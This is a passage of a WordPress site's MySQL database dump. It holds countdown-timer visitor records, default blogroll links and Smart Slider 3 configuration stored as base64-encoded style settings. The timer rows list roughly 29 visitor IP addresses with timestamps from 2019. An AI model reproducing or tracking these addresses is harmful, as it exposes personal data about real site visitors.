INSERT INTO `wpxb_hurrytimer_evergreen` VALUES (1,31525,'105.227.141.205',NULL,1563661757490,'2019-08-20 03:32:44'),(2,31525,'165.255.71.127',NULL,1563974727781,'2019-08-24 16:34:58'),(3,31525,'105.228.108.49',NULL,1563909739514,'2019-08-23 00:24:39'),(4,31525,'105.184.144.39',NULL,1563909739514,'2019-08-23 01:21:49'),(5,31525,'72.14.199.241',NULL,1564570800069,'2019-08-30 16:12:27'),(6,31525,'105.187.241.4',NULL,1564575032961,'2019-08-30 17:11:02'),(7,31525,'105.186.131.6',NULL,1564651013994,'2019-08-31 14:16:57'),(8,31525,'196.50.230.86',NULL,1564657368066,'2019-08-31 16:02:50'),(9,31525,'41.13.136.49',NULL,1564657410118,'2019-08-31 16:10:18'),(10,31525,'165.16.176.150',NULL,1564658097022,'2019-08-31 16:15:14'),(11,31525,'102.250.4.86',NULL,1564659684818,'2019-08-31 16:41:29'),(12,31525,'169.159.154.37',NULL,1564659824401,'2019-08-31 16:50:16'),(13,31525,'197.229.5.22',NULL,1564668573688,'2019-08-31 19:09:41'),(14,31525,'197.229.5.110',NULL,1564668939405,'2019-08-31 19:15:44'),(15,31525,'105.4.3.33',NULL,1564677083518,'2019-08-31 21:39:23'),(16,31525,'41.13.191.15',NULL,1564677620342,'2019-08-31 21:40:25'),(17,31525,'197.228.50.191',NULL,1564678663412,'2019-08-31 21:57:42'),(18,31525,'102.250.0.151',NULL,1564680759580,'2019-08-31 22:58:16'),(19,31525,'102.250.0.197',NULL,1564680759580,'2019-08-31 22:49:56'),(20,31525,'102.250.0.168',NULL,1564680759580,'2019-08-31 22:58:53'),(21,31525,'102.250.0.250',NULL,1564680759580,'2019-08-31 23:00:21'),(22,31525,'102.250.0.165',NULL,1564693048607,'2019-09-01 01:57:36'),(23,31525,'102.250.0.253',NULL,1564693048607,'2019-09-01 02:01:02'),(24,31525,'165.255.71.243',NULL,1565002687436,'2019-09-04 15:58:08'),(25,31525,'41.58.137.77',NULL,1564736477825,'2019-09-01 14:01:27'),(26,31525,'105.187.240.4',NULL,1566032274105,'2019-09-16 13:59:11'),(27,31525,'165.255.168.137',NULL,1566834486186,'2019-09-25 20:52:51'),(28,31525,'41.13.124.103',NULL,1566557694673,'2019-09-22 15:55:17'),(29,31525,'102.250.225.121',NULL,1566828848902,'2019-09-25 19:18:52');
/*!40000 ALTER TABLE `wpxb_hurrytimer_evergreen` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_links`
--

DROP TABLE IF EXISTS `wpxb_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_links`
--

LOCK TABLES `wpxb_links` WRITE;
/*!40000 ALTER TABLE `wpxb_links` DISABLE KEYS */;
INSERT INTO `wpxb_links` VALUES (1,'http://codex.wordpress.org/','Documentation','','','','Y',1,0,'0000-00-00 00:00:00','','',''),(2,'http://wordpress.org/development/','WordPress Blog','','','','Y',1,0,'0000-00-00 00:00:00','','','http://wordpress.org/development/feed/'),(3,'http://wordpress.org/extend/ideas/','Suggest Ideas','','','','Y',1,0,'0000-00-00 00:00:00','','',''),(4,'http://wordpress.org/support/','Support Forum','','','','Y',1,0,'0000-00-00 00:00:00','','',''),(5,'http://wordpress.org/extend/plugins/','Plugins','','','','Y',1,0,'0000-00-00 00:00:00','','',''),(6,'http://wordpress.org/extend/themes/','Themes','','','','Y',1,0,'0000-00-00 00:00:00','','',''),(7,'http://planet.wordpress.org/','WordPress Planet','','','','Y',1,0,'0000-00-00 00:00:00','','','');
/*!40000 ALTER TABLE `wpxb_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_nextend2_image_storage`
--

DROP TABLE IF EXISTS `wpxb_nextend2_image_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_nextend2_image_storage` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `hash` varchar(32) NOT NULL,
  `image` text NOT NULL,
  `value` mediumtext NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `hash` (`hash`)
) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_nextend2_image_storage`
--

LOCK TABLES `wpxb_nextend2_image_storage` WRITE;
/*!40000 ALTER TABLE `wpxb_nextend2_image_storage` DISABLE KEYS */;
INSERT INTO `wpxb_nextend2_image_storage` VALUES (1,'8c3d60666735c28a2681ce7be8175e27','$/uploads/2016/03/Front-page-Welcome-rmb-1-White-business-sorted.png','eyJkZXNrdG9wIjp7InNpemUiOiIwfCp8MCJ9LCJkZXNrdG9wLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJ0YWJsZXQiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwidGFibGV0LXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJtb2JpbGUiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwibW9iaWxlLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9fQ=='),(2,'42f9906a430a7a6a91311d213e49f04f','$/uploads/2016/03/Front-page-New-registration-front-page.png','eyJkZXNrdG9wIjp7InNpemUiOiIwfCp8MCJ9LCJkZXNrdG9wLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJ0YWJsZXQiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwidGFibGV0LXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJtb2JpbGUiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwibW9iaWxlLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9fQ=='),(3,'84cded760deb581ca7fa23eb9ab7505a','$/uploads/2016/03/Front-page-tax-registration.png','eyJkZXNrdG9wIjp7InNpemUiOiIwfCp8MCJ9LCJkZXNrdG9wLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJ0YWJsZXQiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwidGFibGV0LXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJtb2JpbGUiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwibW9iaWxlLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9fQ=='),(4,'716e474b25bcae0219b40476f21d68cf','$/uploads/2016/03/Front-page-maintaining-Final.png','eyJkZXNrdG9wIjp7InNpemUiOiIwfCp8MCJ9LCJkZXNrdG9wLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJ0YWJsZXQiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwidGFibGV0LXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJtb2JpbGUiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwibW9iaWxlLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9fQ=='),(5,'946cdf24d583cf80e15ccce14b040806','$/uploads/2016/03/Front-page-BEE.png','eyJkZXNrdG9wIjp7InNpemUiOiIwfCp8MCJ9LCJkZXNrdG9wLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJ0YWJsZXQiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwidGFibGV0LXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJtb2JpbGUiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwibW9iaWxlLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9fQ=='),(6,'cd7a9dc19aee484403d5b16da55c2b06','$/uploads/2016/03/Front-page-Biz-Tools.png','eyJkZXNrdG9wIjp7InNpemUiOiIwfCp8MCJ9LCJkZXNrdG9wLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJ0YWJsZXQiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwidGFibGV0LXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJtb2JpbGUiOnsiaW1hZ2UiOiIiLCJzaXplIjoiMHwqfDAifSwibW9iaWxlLXJldGluYSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9fQ=='),(7,'49a8ed469d6983d4898be0971ac16459','http://smartslider3.com/sample/programmer.jpg','eyJkZXNrdG9wIjp7InNpemUiOiIxMjAwfCp8NjAwIn0sImRlc2t0b3AtcmV0aW5hIjp7ImltYWdlIjoiIiwic2l6ZSI6IjB8KnwwIn0sInRhYmxldCI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJ0YWJsZXQtcmV0aW5hIjp7ImltYWdlIjoiIiwic2l6ZSI6IjB8KnwwIn0sIm1vYmlsZSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJtb2JpbGUtcmV0aW5hIjp7ImltYWdlIjoiIiwic2l6ZSI6IjB8KnwwIn19'),(8,'a0b16b7e1bd6a957cb98b5b9edb85029','http://smartslider3.com/sample/free1.jpg','eyJkZXNrdG9wIjp7InNpemUiOiIxMjAwfCp8NjAwIn0sImRlc2t0b3AtcmV0aW5hIjp7ImltYWdlIjoiIiwic2l6ZSI6IjB8KnwwIn0sInRhYmxldCI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJ0YWJsZXQtcmV0aW5hIjp7ImltYWdlIjoiIiwic2l6ZSI6IjB8KnwwIn0sIm1vYmlsZSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJtb2JpbGUtcmV0aW5hIjp7ImltYWdlIjoiIiwic2l6ZSI6IjB8KnwwIn19'),(9,'b289ede7fdbce72fd19c282a305de016','http://smartslider3.com/sample/photographer.jpg','eyJkZXNrdG9wIjp7InNpemUiOiIxMjAwfCp8NjAwIn0sImRlc2t0b3AtcmV0aW5hIjp7ImltYWdlIjoiIiwic2l6ZSI6IjB8KnwwIn0sInRhYmxldCI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJ0YWJsZXQtcmV0aW5hIjp7ImltYWdlIjoiIiwic2l6ZSI6IjB8KnwwIn0sIm1vYmlsZSI6eyJpbWFnZSI6IiIsInNpemUiOiIwfCp8MCJ9LCJtb2JpbGUtcmV0aW5hIjp7ImltYWdlIjoiIiwic2l6ZSI6IjB8KnwwIn19');
/*!40000 ALTER TABLE `wpxb_nextend2_image_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_nextend2_section_storage`
--

DROP TABLE IF EXISTS `wpxb_nextend2_section_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_nextend2_section_storage` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `application` varchar(20) NOT NULL,
  `section` varchar(32) NOT NULL,
  `referencekey` varchar(64) DEFAULT '',
  `value` mediumtext NOT NULL,
  `system` int(11) NOT NULL DEFAULT 0,
  `editable` int(11) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `application` (`application`,`section`,`referencekey`),
  KEY `application_2` (`application`,`section`)
) ENGINE=MyISAM AUTO_INCREMENT=10006 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_nextend2_section_storage`
--

LOCK TABLES `wpxb_nextend2_section_storage` WRITE;
/*!40000 ALTER TABLE `wpxb_nextend2_section_storage` DISABLE KEYS */;
INSERT INTO `wpxb_nextend2_section_storage` VALUES (10000,'smartslider','settings','','{\"discover\":0}',0,1),(10001,'smartslider','sliderChanged','2','0',0,1),(10002,'system','style','1000','eyJuYW1lIjoiUm91bmRlZCBQdXJwbGUiLCJkYXRhIjpbeyJiYWNrZ3JvdW5kY29sb3IiOiJmZmZmZmYwMCIsInBhZGRpbmciOiI1fCp8MjB8Knw1fCp8MjB8KnxweCIsImJveHNoYWRvdyI6IjJ8KnwyfCp8MnwqfDJ8KnwwMDAwMDBmZiIsImJvcmRlciI6IjB8KnxkYXNoZWR8KnwwMDAwMDBmZiIsImJvcmRlcnJhZGl1cyI6IjMiLCJleHRyYSI6IiJ9LHsiZXh0cmEiOiIifV19',0,1),(10003,'smartslider','sliderChanged','1','1',0,1),(10004,'smartslider','free','rated','1',0,1),(10005,'system','global','n2_ss3_version','3.2.4',1,1);
/*!40000 ALTER TABLE `wpxb_nextend2_section_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_nextend2_smartslider3_generators`
--

DROP TABLE IF EXISTS `wpxb_nextend2_smartslider3_generators`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_nextend2_smartslider3_generators` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `group` varchar(254) NOT NULL,
  `type` varchar(254) NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_nextend2_smartslider3_generators`
--

LOCK TABLES `wpxb_nextend2_smartslider3_generators` WRITE;
/*!40000 ALTER TABLE `wpxb_nextend2_smartslider3_generators` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_nextend2_smartslider3_generators` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_nextend2_smartslider3_sliders`
--

DROP TABLE IF EXISTS `wpxb_nextend2_smartslider3_sliders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_nextend2_smartslider3_sliders` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(100) NOT NULL,
  `type` varchar(30) NOT NULL,
  `params` mediumtext NOT NULL,
  `time` datetime NOT NULL,
  `thumbnail` varchar(255) NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_nextend2_smartslider3_sliders`
--

LOCK TABLES `wpxb_nextend2_smartslider3_sliders` WRITE;
/*!40000 ALTER TABLE `wpxb_nextend2_smartslider3_sliders` DISABLE KEYS */;
INSERT INTO `wpxb_nextend2_smartslider3_sliders` VALUES (1,'Sample Slider','simple','{\"widget-bullet-position-mode\":\"simple\",\"widget-bullet-position-area\":\"12\",\"widget-bullet-position-offset\":\"10\",\"widget-bullet-action\":\"click\",\"widget-bullet-style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwYWIiLCJwYWRkaW5nIjoiNXwqfDV8Knw1fCp8NXwqfHB4IiwiYm94c2hhZG93IjoiMHwqfDB8KnwwfCp8MHwqfDAwMDAwMGZmIiwiYm9yZGVyIjoiMHwqfHNvbGlkfCp8MDAwMDAwZmYiLCJib3JkZXJyYWRpdXMiOiI1MCIsImV4dHJhIjoibWFyZ2luOiA0cHg7In0seyJleHRyYSI6IiIsImJhY2tncm91bmRjb2xvciI6IjA5YjQ3NGZmIn1dfQ==\",\"widget-bullet-bar\":\"\",\"widget-bullet-align\":\"center\",\"widget-bullet-orientation\":\"auto\",\"widget-bullet-bar-full-size\":0,\"widget-bullet-overlay\":0,\"widget-bullet-thumbnail-show-image\":\"1\",\"widget-bullet-thumbnail-width\":\"120\",\"widget-bullet-thumbnail-style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwODAiLCJwYWRkaW5nIjoiM3wqfDN8KnwzfCp8M3wqfHB4IiwiYm94c2hhZG93IjoiMHwqfDB8KnwwfCp8MHwqfDAwMDAwMGZmIiwiYm9yZGVyIjoiMHwqfHNvbGlkfCp8MDAwMDAwZmYiLCJib3JkZXJyYWRpdXMiOiIzIiwiZXh0cmEiOiJtYXJnaW46IDVweDsifV19\",\"widget-bullet-thumbnail-side\":\"before\",\"widget-arrow-responsive-desktop\":1,\"widget-arrow-responsive-tablet\":0.7,\"widget-arrow-responsive-mobile\":0.5,\"widget-arrow-previous-image\":\"\",\"widget-arrow-previous\":\"$ss$/plugins/widgetarrow/image/image/previous/thin-horizontal.svg\",\"widget-arrow-previous-color\":\"ffffffcc\",\"widget-arrow-previous-hover\":\"0\",\"widget-arrow-previous-hover-color\":\"ffffffcc\",\"widget-arrow-style\":\"\",\"widget-arrow-previous-position-mode\":\"simple\",\"widget-arrow-previous-position-area\":\"6\",\"widget-arrow-previous-position-offset\":\"15\",\"widget-arrow-next-position-mode\":\"simple\",\"widget-arrow-next-position-area\":\"7\",\"widget-arrow-next-position-offset\":\"15\",\"widget-arrow-animation\":\"fade\",\"widget-arrow-mirror\":1,\"widget-arrow-next-image\":\"\",\"widget-arrow-next\":\"$ss$/plugins/widgetarrow/image/image/next/thin-horizontal.svg\",\"widget-arrow-next-color\":\"ffffffcc\",\"widget-arrow-next-hover\":0,\"widget-arrow-next-hover-color\":\"ffffffcc\",\"controlsScroll\":\"0\",\"controlsDrag\":\"1\",\"controlsTouch\":\"horizontal\",\"controlsKeyboard\":\"1\",\"align\":\"normal\",\"animation\":\"horizontal\",\"animation-duration\":\"600\",\"background-animation\":\"\",\"background-animation-speed\":\"normal\",\"width\":\"1200\",\"height\":\"600\",\"fontsize\":\"16\",\"margin\":\"0|*|0|*|0|*|0\",\"responsive-mode\":\"auto\",\"responsiveScaleDown\":\"1\",\"responsiveScaleUp\":\"1\",\"responsiveSliderHeightMin\":\"0\",\"responsiveSliderHeightMax\":\"3000\",\"responsiveSlideWidthMax\":\"3000\",\"autoplay\":\"1\",\"autoplayDuration\":\"8000\",\"autoplayStopClick\":\"1\",\"autoplayStopMouse\":\"0\",\"autoplayStopMedia\":\"1\",\"widgetarrow\":\"imageEmpty\",\"widget-arrow-display-hover\":\"0\",\"widget-arrow-previous-position-stack\":\"1\",\"widget-arrow-previous-position-horizontal\":\"left\",\"widget-arrow-previous-position-horizontal-position\":\"0\",\"widget-arrow-previous-position-horizontal-unit\":\"px\",\"widget-arrow-previous-position-vertical\":\"top\",\"widget-arrow-previous-position-vertical-position\":\"0\",\"widget-arrow-previous-position-vertical-unit\":\"px\",\"widget-arrow-next-position-stack\":\"1\",\"widget-arrow-next-position-horizontal\":\"left\",\"widget-arrow-next-position-horizontal-position\":\"0\",\"widget-arrow-next-position-horizontal-unit\":\"px\",\"widget-arrow-next-position-vertical\":\"top\",\"widget-arrow-next-position-vertical-position\":\"0\",\"widget-arrow-next-position-vertical-unit\":\"px\",\"widgetbullet\":\"transition\",\"widget-bullet-display-hover\":\"0\",\"widget-bullet-thumbnail-height\":\"81\",\"widget-bullet-position-stack\":\"1\",\"widget-bullet-position-horizontal\":\"left\",\"widget-bullet-position-horizontal-position\":\"0\",\"widget-bullet-position-horizontal-unit\":\"px\",\"widget-bullet-position-vertical\":\"top\",\"widget-bullet-position-vertical-position\":\"0\",\"widget-bullet-position-vertical-unit\":\"px\",\"widgetautoplay\":\"disabled\",\"widget-autoplay-display-hover\":\"0\",\"widgetbar\":\"disabled\",\"widget-bar-display-hover\":\"0\",\"widgetthumbnail\":\"disabled\",\"widget-thumbnail-display-hover\":\"0\",\"widget-thumbnail-width\":\"100\",\"widget-thumbnail-height\":\"60\",\"widgetshadow\":\"disabled\",\"widgets\":\"bullet\",\"background\":\"\"}','2015-11-01 14:14:20','',0),(2,'Front page','simple','{\"controlsScroll\":\"0\",\"controlsDrag\":\"1\",\"controlsTouch\":\"horizontal\",\"controlsKeyboard\":\"1\",\"align\":\"center\",\"animation\":\"horizontal\",\"animation-duration\":\"500\",\"background-animation\":\"1024\",\"background-animation-speed\":\"normal\",\"width\":\"750\",\"height\":\"360\",\"fontsize\":\"16\",\"margin\":\"0|*|0|*|0|*|0\",\"backgroundMode\":\"fill\",\"responsive-mode\":\"auto\",\"responsiveScaleDown\":\"1\",\"responsiveScaleUp\":\"0\",\"responsiveSliderHeightMin\":\"0\",\"responsiveSliderHeightMax\":\"3000\",\"responsiveSlideWidthMax\":\"3000\",\"autoplay\":\"1\",\"autoplayDuration\":\"2000\",\"autoplayStopClick\":\"1\",\"autoplayStopMouse\":\"enter\",\"autoplayStopMedia\":\"1\",\"optimize\":\"0\",\"optimize-quality\":\"70\",\"optimize-background-image-custom\":\"0\",\"optimize-background-image-width\":\"800\",\"optimize-background-image-height\":\"600\",\"optimizeThumbnailWidth\":\"100\",\"optimizeThumbnailHeight\":\"60\",\"weaker-selector\":\"0\",\"delay\":\"0\",\"dependency\":\"\",\"is-delayed\":\"0\",\"overflow-hidden-page\":\"0\",\"callbacks\":\"\",\"widgetarrow\":\"imageSmallRectangle\",\"widget-arrow-display-hover\":\"0\",\"widget-arrow-previous\":\"$ss$\\/plugins\\/widgetarrow\\/image\\/image\\/previous\\/full.svg\",\"widget-arrow-previous-color\":\"ffffffcc\",\"widget-arrow-previous-hover\":\"0\",\"widget-arrow-previous-hover-color\":\"ffffffcc\",\"widget-arrow-style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwYWIiLCJwYWRkaW5nIjoiMnwqfDJ8KnwyfCp8MnwqfHB4IiwiYm94c2hhZG93IjoiMHwqfDB8KnwwfCp8MHwqfDAwMDAwMGZmIiwiYm9yZGVyIjoiMHwqfHNvbGlkfCp8MDAwMDAwZmYiLCJib3JkZXJyYWRpdXMiOiIzIiwiZXh0cmEiOiIifSx7ImJhY2tncm91bmRjb2xvciI6IjAxYWRkM2Q5In1dfQ==\",\"widget-arrow-previous-position-mode\":\"simple\",\"widget-arrow-previous-position-area\":\"6\",\"widget-arrow-previous-position-stack\":\"1\",\"widget-arrow-previous-position-offset\":\"15\",\"widget-arrow-previous-position-horizontal\":\"left\",\"widget-arrow-previous-position-horizontal-position\":\"0\",\"widget-arrow-previous-position-horizontal-unit\":\"px\",\"widget-arrow-previous-position-vertical\":\"top\",\"widget-arrow-previous-position-vertical-position\":\"0\",\"widget-arrow-previous-position-vertical-unit\":\"px\",\"widget-arrow-next-position-mode\":\"simple\",\"widget-arrow-next-position-area\":\"7\",\"widget-arrow-next-position-stack\":\"1\",\"widget-arrow-next-position-offset\":\"15\",\"widget-arrow-next-position-horizontal\":\"left\",\"widget-arrow-next-position-horizontal-position\":\"0\",\"widget-arrow-next-position-horizontal-unit\":\"px\",\"widget-arrow-next-position-vertical\":\"top\",\"widget-arrow-next-position-vertical-position\":\"0\",\"widget-arrow-next-position-vertical-unit\":\"px\",\"widgetbullet\":\"disabled\",\"widget-bullet-display-hover\":\"1\",\"widget-bullet-thumbnail-show-image\":\"1\",\"widget-bullet-thumbnail-width\":\"100\",\"widget-bullet-thumbnail-height\":\"60\",\"widget-bullet-thumbnail-style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwODAiLCJwYWRkaW5nIjoiM3wqfDN8KnwzfCp8M3wqfHB4IiwiYm94c2hhZG93IjoiMHwqfDB8KnwwfCp8MHwqfDAwMDAwMGZmIiwiYm9yZGVyIjoiMHwqfHNvbGlkfCp8MDAwMDAwZmYiLCJib3JkZXJyYWRpdXMiOiIzIiwiZXh0cmEiOiJtYXJnaW46IDVweDsifV19\",\"widget-bullet-thumbnail-side\":\"before\",\"widgetautoplay\":\"disabled\",\"widget-autoplay-display-hover\":\"0\",\"widgetbar\":\"disabled\",\"widget-bar-display-hover\":\"1\",\"widgetthumbnail\":\"default\",\"widget-thumbnail-display-hover\":\"1\",\"widget-thumbnail-width\":\"100\",\"widget-thumbnail-height\":\"60\",\"widget-thumbnail-minimum-thumbnail-count\":\"1\",\"widget-thumbnail-position-mode\":\"simple\",\"widget-thumbnail-position-area\":\"10\",\"widget-thumbnail-position-stack\":\"1\",\"widget-thumbnail-position-offset\":\"0\",\"widget-thumbnail-position-horizontal\":\"left\",\"widget-thumbnail-position-horizontal-position\":\"0\",\"widget-thumbnail-position-horizontal-unit\":\"px\",\"widget-thumbnail-position-vertical\":\"top\",\"widget-thumbnail-position-vertical-position\":\"0\",\"widget-thumbnail-position-vertical-unit\":\"px\",\"widget-thumbnail-style-bar\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMjQyNDI0ZmYiLCJwYWRkaW5nIjoiM3wqfDN8KnwzfCp8M3wqfHB4IiwiYm94c2hhZG93IjoiMHwqfDB8KnwwfCp8MHwqfDAwMDAwMGZmIiwiYm9yZGVyIjoiMHwqfHNvbGlkfCp8MDAwMDAwZmYiLCJib3JkZXJyYWRpdXMiOiIwIiwiZXh0cmEiOiIifV19\",\"widget-thumbnail-style-slides\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwMDAiLCJwYWRkaW5nIjoiMHwqfDB8KnwwfCp8MHwqfHB4IiwiYm94c2hhZG93IjoiMHwqfDB8KnwwfCp8MHwqfDAwMDAwMGZmIiwiYm9yZGVyIjoiMHwqfHNvbGlkfCp8ZmZmZmZmMDAiLCJib3JkZXJyYWRpdXMiOiIwIiwiZXh0cmEiOiJvcGFjaXR5OiAwLjQ7XG5tYXJnaW46IDNweDtcbnRyYW5zaXRpb246IGFsbCAwLjRzO1xuYmFja2dyb3VuZC1zaXplOiBjb3ZlcjsifSx7ImJvcmRlciI6IjB8Knxzb2xpZHwqfGZmZmZmZmNjIiwiZXh0cmEiOiJvcGFjaXR5OiAxOyJ9XX0=\",\"widget-thumbnail-arrow\":\"1\",\"widget-thumbnail-title-style\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siYmFja2dyb3VuZGNvbG9yIjoiMDAwMDAwYWIiLCJwYWRkaW5nIjoiM3wqfDEwfCp8M3wqfDEwfCp8cHgiLCJib3hzaGFkb3ciOiIwfCp8MHwqfDB8KnwwfCp8MDAwMDAwZmYiLCJib3JkZXIiOiIwfCp8c29saWR8KnwwMDAwMDBmZiIsImJvcmRlcnJhZGl1cyI6IjAiLCJleHRyYSI6ImJvdHRvbTogMDtcbmxlZnQ6IDA7In1dfQ==\",\"widget-thumbnail-title\":\"0\",\"widget-thumbnail-title-font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siY29sb3IiOiJmZmZmZmZmZiIsInNpemUiOiIxMnx8cHgiLCJ0c2hhZG93IjoiMHwqfDB8KnwwfCp8MDAwMDAwYWIiLCJhZm9udCI6Ik1vbnRzZXJyYXQiLCJsaW5laGVpZ2h0IjoiMS4yIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOjAsImFsaWduIjoibGVmdCJ9LHsiY29sb3IiOiJmYzI4MjhmZiIsImFmb250IjoiZ29vZ2xlKEBpbXBvcnQgdXJsKGh0dHA6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M\\/ZmFtaWx5PVJhbGV3YXkpOyksQXJpYWwiLCJzaXplIjoiMjV8fHB4In0se31dfQ==\",\"widget-thumbnail-description\":\"0\",\"widget-thumbnail-description-font\":\"eyJuYW1lIjoiU3RhdGljIiwiZGF0YSI6W3siY29sb3IiOiJmZmZmZmZmZiIsInNpemUiOiIxMnx8cHgiLCJ0c2hhZG93IjoiMHwqfDB8KnwwfCp8MDAwMDAwYWIiLCJhZm9udCI6Ik1vbnRzZXJyYXQiLCJsaW5laGVpZ2h0IjoiMS4zIiwiYm9sZCI6MCwiaXRhbGljIjowLCJ1bmRlcmxpbmUiOj